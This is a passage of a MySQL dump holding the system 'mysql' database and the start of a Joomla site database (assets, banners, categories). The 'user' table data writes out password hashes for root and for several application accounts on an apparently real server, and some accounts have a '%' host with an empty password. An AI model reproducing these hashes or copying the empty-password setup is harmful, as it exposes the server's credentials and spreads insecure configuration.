KEYS */; /*!40000 ALTER TABLE `time_zone_transition` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `time_zone_transition_type` -- DROP TABLE IF EXISTS `time_zone_transition_type`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `time_zone_transition_type` ( `Time_zone_id` int(10) unsigned NOT NULL, `Transition_type_id` int(10) unsigned NOT NULL, `Offset` int(11) NOT NULL DEFAULT '0', `Is_DST` tinyint(3) unsigned NOT NULL DEFAULT '0', `Abbreviation` char(8) NOT NULL DEFAULT '', PRIMARY KEY (`Time_zone_id`,`Transition_type_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zone transition types'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `time_zone_transition_type` -- LOCK TABLES `time_zone_transition_type` WRITE; /*!40000 ALTER TABLE `time_zone_transition_type` DISABLE KEYS */; /*!40000 ALTER TABLE `time_zone_transition_type` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `user` -- DROP TABLE IF EXISTS `user`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `user` ( `Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT '', `User` char(16) COLLATE utf8_bin NOT NULL DEFAULT '', `Password` char(41) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '', `Select_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Insert_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Update_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Delete_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Drop_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Reload_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Shutdown_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Process_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `File_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Grant_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `References_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Index_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Alter_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Show_db_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Super_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_tmp_table_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Lock_tables_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Execute_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Repl_slave_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Repl_client_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Show_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Alter_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_user_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Event_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Trigger_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `Create_tablespace_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N', `ssl_type` enum('','ANY','X509','SPECIFIED') CHARACTER SET utf8 NOT NULL DEFAULT '', `ssl_cipher` blob NOT NULL, `x509_issuer` blob NOT NULL, `x509_subject` blob NOT NULL, `max_questions` int(11) unsigned NOT NULL DEFAULT '0', `max_updates` int(11) unsigned NOT NULL DEFAULT '0', `max_connections` int(11) unsigned NOT NULL DEFAULT '0', `max_user_connections` int(11) unsigned NOT NULL DEFAULT '0', `plugin` char(64) COLLATE utf8_bin DEFAULT '', `authentication_string` text COLLATE utf8_bin, PRIMARY KEY (`Host`,`User`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Users and global privileges'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `user` -- LOCK TABLES `user` WRITE; /*!40000 ALTER TABLE `user` DISABLE KEYS */; INSERT INTO `user` VALUES ('localhost','root','*DC0F0A1A10455DE1BDA161BCA216178D02073AA4','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0,0,'',''),('h2321533','root','*DC0F0A1A10455DE1BDA161BCA216178D02073AA4','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0,0,'',''),('127.0.0.1','root','*DC0F0A1A10455DE1BDA161BCA216178D02073AA4','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0,0,'',''),('::1','root','*DC0F0A1A10455DE1BDA161BCA216178D02073AA4','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0,0,'',''),('localhost','debian-sys-maint','*FFCF66212178816FB3C3B12E91787A83F4A25249','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','',0,0,0,0,'',NULL),('localhost','redmine_default','*BD44D8E2E27CB477CC12C1F45823FD8264921D23','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('localhost','phpmyadmin','*BD44D8E2E27CB477CC12C1F45823FD8264921D23','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('localhost','wp_ollital','*D15120CA8C1DDCB5BC4B3BA8A51A1071AEA85A45','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('%','wp_ollital','','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('localhost','drupal7','*34514386E45BBB7B37D2DECFF11D926594BE683E','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('%','drupal7','','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('localhost','joomla3','*D15120CA8C1DDCB5BC4B3BA8A51A1071AEA85A45','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('localhost','vmail','*753842A16BDDFD3470F32AEA86A0940200D1C45F','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('’localhost’','‘vmail’','*753842A16BDDFD3470F32AEA86A0940200D1C45F','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('localhost','wiki','*D15120CA8C1DDCB5BC4B3BA8A51A1071AEA85A45','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('%','wiki@localhost','','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('%','wiki','','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('localhost','blt','*D15120CA8C1DDCB5BC4B3BA8A51A1071AEA85A45','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL),('%','blt@localhost','','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','N','','','','',0,0,0,0,'',NULL); /*!40000 ALTER TABLE `user` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping events for database 'mysql' -- -- -- Table structure for table `general_log` -- /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE IF NOT EXISTS `general_log` ( `event_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `user_host` mediumtext NOT NULL, `thread_id` int(11) NOT NULL, `server_id` int(10) unsigned NOT NULL, `command_type` varchar(64) NOT NULL, `argument` mediumtext NOT NULL ) ENGINE=CSV DEFAULT CHARSET=utf8 COMMENT='General log'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Table structure for table `slow_log` -- /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE IF NOT EXISTS `slow_log` ( `start_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `user_host` mediumtext NOT NULL, `query_time` time NOT NULL, `lock_time` time NOT NULL, `rows_sent` int(11) NOT NULL, `rows_examined` int(11) NOT NULL, `db` varchar(512) NOT NULL, `last_insert_id` int(11) NOT NULL, `insert_id` int(11) NOT NULL, `server_id` int(10) unsigned NOT NULL, `sql_text` mediumtext NOT NULL ) ENGINE=CSV DEFAULT CHARSET=utf8 COMMENT='Slow log'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Current Database: `ollital_joomla` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `ollital_joomla` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `ollital_joomla`; -- -- Table structure for table `qo1a2_assets` -- DROP TABLE IF EXISTS `qo1a2_assets`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_assets` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', `parent_id` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set parent.', `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.', `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.', `level` int(10) unsigned NOT NULL COMMENT 'The cached level in the nested tree.', `name` varchar(50) NOT NULL COMMENT 'The unique name for the asset.\n', `title` varchar(100) NOT NULL COMMENT 'The descriptive title for the asset.', `rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.', PRIMARY KEY (`id`), UNIQUE KEY `idx_asset_name` (`name`), KEY `idx_lft_rgt` (`lft`,`rgt`), KEY `idx_parent_id` (`parent_id`) ) ENGINE=InnoDB AUTO_INCREMENT=54 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_assets` -- LOCK TABLES `qo1a2_assets` WRITE; /*!40000 ALTER TABLE `qo1a2_assets` DISABLE KEYS */; INSERT INTO `qo1a2_assets` VALUES (1,0,0,105,0,'root.1','Root Asset','{\"core.login.site\":{\"6\":1,\"2\":1},\"core.login.admin\":{\"6\":1},\"core.login.offline\":{\"6\":1},\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(2,1,1,2,1,'com_admin','com_admin','{}'),(3,1,3,6,1,'com_banners','com_banners','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(4,1,7,8,1,'com_cache','com_cache','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(5,1,9,10,1,'com_checkin','com_checkin','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(6,1,11,12,1,'com_config','com_config','{}'),(7,1,13,16,1,'com_contact','com_contact','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(8,1,17,20,1,'com_content','com_content','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(9,1,21,22,1,'com_cpanel','com_cpanel','{}'),(10,1,23,24,1,'com_installer','com_installer','{\"core.admin\":[],\"core.manage\":{\"7\":0},\"core.delete\":{\"7\":0},\"core.edit.state\":{\"7\":0}}'),(11,1,25,26,1,'com_languages','com_languages','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(12,1,27,28,1,'com_login','com_login','{}'),(13,1,29,30,1,'com_mailto','com_mailto','{}'),(14,1,31,32,1,'com_massmail','com_massmail','{}'),(15,1,33,34,1,'com_media','com_media','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":{\"5\":1}}'),(16,1,35,36,1,'com_menus','com_menus','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(17,1,37,38,1,'com_messages','com_messages','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(18,1,39,70,1,'com_modules','com_modules','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(19,1,71,74,1,'com_newsfeeds','com_newsfeeds','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(20,1,75,76,1,'com_plugins','com_plugins','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(21,1,77,78,1,'com_redirect','com_redirect','{\"core.admin\":{\"7\":1},\"core.manage\":[]}'),(22,1,79,80,1,'com_search','com_search','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(23,1,81,82,1,'com_templates','com_templates','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(24,1,83,86,1,'com_users','com_users','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(25,1,87,90,1,'com_weblinks','com_weblinks','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(26,1,91,92,1,'com_wrapper','com_wrapper','{}'),(27,8,18,19,2,'com_content.category.2','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(28,3,4,5,2,'com_banners.category.3','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(29,7,14,15,2,'com_contact.category.4','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(30,19,72,73,2,'com_newsfeeds.category.5','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(31,25,88,89,2,'com_weblinks.category.6','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(32,24,84,85,1,'com_users.category.7','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(33,1,93,94,1,'com_finder','com_finder','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(34,1,95,96,1,'com_joomlaupdate','com_joomlaupdate','{\"core.admin\":[],\"core.manage\":[],\"core.delete\":[],\"core.edit.state\":[]}'),(35,1,97,98,1,'com_tags','com_tags','{\"core.admin\":[],\"core.manage\":[],\"core.manage\":[],\"core.delete\":[],\"core.edit.state\":[]}'),(36,1,99,100,1,'com_contenthistory','com_contenthistory','{}'),(37,1,101,102,1,'com_ajax','com_ajax','{}'),(38,1,103,104,1,'com_postinstall','com_postinstall','{}'),(39,18,40,41,2,'com_modules.module.1','Main Menu','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(40,18,42,43,2,'com_modules.module.2','Login','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(41,18,44,45,2,'com_modules.module.3','Popular Articles','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(42,18,46,47,2,'com_modules.module.4','Recently Added Articles','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(43,18,48,49,2,'com_modules.module.8','Toolbar','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(44,18,50,51,2,'com_modules.module.9','Quick Icons','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(45,18,52,53,2,'com_modules.module.10','Logged-in Users','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(46,18,54,55,2,'com_modules.module.12','Admin Menu','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(47,18,56,57,2,'com_modules.module.13','Admin Submenu','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(48,18,58,59,2,'com_modules.module.14','User Status','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(49,18,60,61,2,'com_modules.module.15','Title','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(50,18,62,63,2,'com_modules.module.16','Login Form','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(51,18,64,65,2,'com_modules.module.17','Breadcrumbs','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(52,18,66,67,2,'com_modules.module.79','Multilanguage status','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(53,18,68,69,2,'com_modules.module.86','Joomla Version','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'); /*!40000 ALTER TABLE `qo1a2_assets` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_associations` -- DROP TABLE IF EXISTS `qo1a2_associations`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_associations` ( `id` int(11) NOT NULL COMMENT 'A reference to the associated item.', `context` varchar(50) NOT NULL COMMENT 'The context of the associated item.', `key` char(32) NOT NULL COMMENT 'The key for the association computed from an md5 on associated ids.', PRIMARY KEY (`context`,`id`), KEY `idx_key` (`key`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_associations` -- LOCK TABLES `qo1a2_associations` WRITE; /*!40000 ALTER TABLE `qo1a2_associations` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_associations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_banner_clients` -- DROP TABLE IF EXISTS `qo1a2_banner_clients`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_banner_clients` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL DEFAULT '', `contact` varchar(255) NOT NULL DEFAULT '', `email` varchar(255) NOT NULL DEFAULT '', `extrainfo` text NOT NULL, `state` tinyint(3) NOT NULL DEFAULT '0', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `metakey` text NOT NULL, `own_prefix` tinyint(4) NOT NULL DEFAULT '0', `metakey_prefix` varchar(255) NOT NULL DEFAULT '', `purchase_type` tinyint(4) NOT NULL DEFAULT '-1', `track_clicks` tinyint(4) NOT NULL DEFAULT '-1', `track_impressions` tinyint(4) NOT NULL DEFAULT '-1', PRIMARY KEY (`id`), KEY `idx_own_prefix` (`own_prefix`), KEY `idx_metakey_prefix` (`metakey_prefix`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_banner_clients` -- LOCK TABLES `qo1a2_banner_clients` WRITE; /*!40000 ALTER TABLE `qo1a2_banner_clients` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_banner_clients` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_banner_tracks` -- DROP TABLE IF EXISTS `qo1a2_banner_tracks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_banner_tracks` ( `track_date` datetime NOT NULL, `track_type` int(10) unsigned NOT NULL, `banner_id` int(10) unsigned NOT NULL, `count` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`track_date`,`track_type`,`banner_id`), KEY `idx_track_date` (`track_date`), KEY `idx_track_type` (`track_type`), KEY `idx_banner_id` (`banner_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_banner_tracks` -- LOCK TABLES `qo1a2_banner_tracks` WRITE; /*!40000 ALTER TABLE `qo1a2_banner_tracks` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_banner_tracks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_banners` -- DROP TABLE IF EXISTS `qo1a2_banners`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_banners` ( `id` int(11) NOT NULL AUTO_INCREMENT, `cid` int(11) NOT NULL DEFAULT '0', `type` int(11) NOT NULL DEFAULT '0', `name` varchar(255) NOT NULL DEFAULT '', `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `imptotal` int(11) NOT NULL DEFAULT '0', `impmade` int(11) NOT NULL DEFAULT '0', `clicks` int(11) NOT NULL DEFAULT '0', `clickurl` varchar(200) NOT NULL DEFAULT '', `state` tinyint(3) NOT NULL DEFAULT '0', `catid` int(10) unsigned NOT NULL DEFAULT '0', `description` text NOT NULL, `custombannercode` varchar(2048) NOT NULL, `sticky` tinyint(1) unsigned NOT NULL DEFAULT '0', `ordering` int(11) NOT NULL DEFAULT '0', `metakey` text NOT NULL, `params` text NOT NULL, `own_prefix` tinyint(1) NOT NULL DEFAULT '0', `metakey_prefix` varchar(255) NOT NULL DEFAULT '', `purchase_type` tinyint(4) NOT NULL DEFAULT '-1', `track_clicks` tinyint(4) NOT NULL DEFAULT '-1', `track_impressions` tinyint(4) NOT NULL DEFAULT '-1', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `reset` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `language` char(7) NOT NULL DEFAULT '', `created_by` int(10) unsigned NOT NULL DEFAULT '0', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_by` int(10) unsigned NOT NULL DEFAULT '0', `version` int(10) unsigned NOT NULL DEFAULT '1', PRIMARY KEY (`id`), KEY `idx_state` (`state`), KEY `idx_own_prefix` (`own_prefix`), KEY `idx_metakey_prefix` (`metakey_prefix`), KEY `idx_banner_catid` (`catid`), KEY `idx_language` (`language`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_banners` -- LOCK TABLES `qo1a2_banners` WRITE; /*!40000 ALTER TABLE `qo1a2_banners` DISABLE KEYS */; /*!40000 ALTER TABLE `qo1a2_banners` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `qo1a2_categories` -- DROP TABLE IF EXISTS `qo1a2_categories`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `qo1a2_categories` ( `id` int(11) NOT NULL AUTO_INCREMENT, `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.', `parent_id` int(10) unsigned NOT NULL DEFAULT '0', `lft` int(11) NOT NULL DEFAULT '0', `rgt` int(11) NOT NULL DEFAULT '0', `level` int(10) unsigned NOT NULL DEFAULT '0', `path` varchar(255) NOT NULL DEFAULT '', `extension` varchar(50) NOT NULL DEFAULT '', `title` varchar(255) NOT NULL, `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `note` varchar(255) NOT NULL DEFAULT '', `description` mediumtext NOT NULL, `published` tinyint(1) NOT NULL DEFAULT '0', `checked_out` int(11) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `access` int(10) unsigned NOT NULL DEFAULT '0', `params` text NOT NULL, `metadesc` varchar(1024) NOT NULL COMMENT 'The meta description for the page.', `metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.', `metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.', `created_user_id` int(10) unsigned NOT NULL DEFAULT '0', `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_user_id` int(10) unsigned NOT NULL DEFAULT '0', `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `hits` int(10) unsigned NOT NULL DEFAULT '0', `language` char(7) NOT NULL, `version` int(10) unsigned NOT NULL DEFAULT '1', PRIMARY KEY (`id`), KEY `cat_idx` (`extension`,`published`,`access`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_path` (`path`), KEY `idx_left_right` (`lft`,`rgt`), KEY `idx_alias` (`alias`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `qo1a2_categories` -- LOCK TABLES `qo1a2_categories` WRITE; /*!40000 ALTER TABLE `qo1a2_categories` DISABLE KEYS */; INSERT INTO `qo1a2_categories` VALUES (1,0,0,0,13,0,'','system','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','{}',42,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(2,27,1,1,2,1,'uncategorised','com_content','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',42,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(3,28,1,3,4,1,'uncategorised','com_banners','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',42,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(4,29,1,5,6,1,'uncategorised','com_contact','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',42,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(5,30,1,7,8,1,'uncategorised','com_newsfeeds','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',42,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(6,31,1,9,10,1,'uncategorised','com_weblinks','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',42,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(7,32,1,11,12,1,'uncategorised','com_users','Uncategorised','uncategorised','','',1,0,'0000-00-00 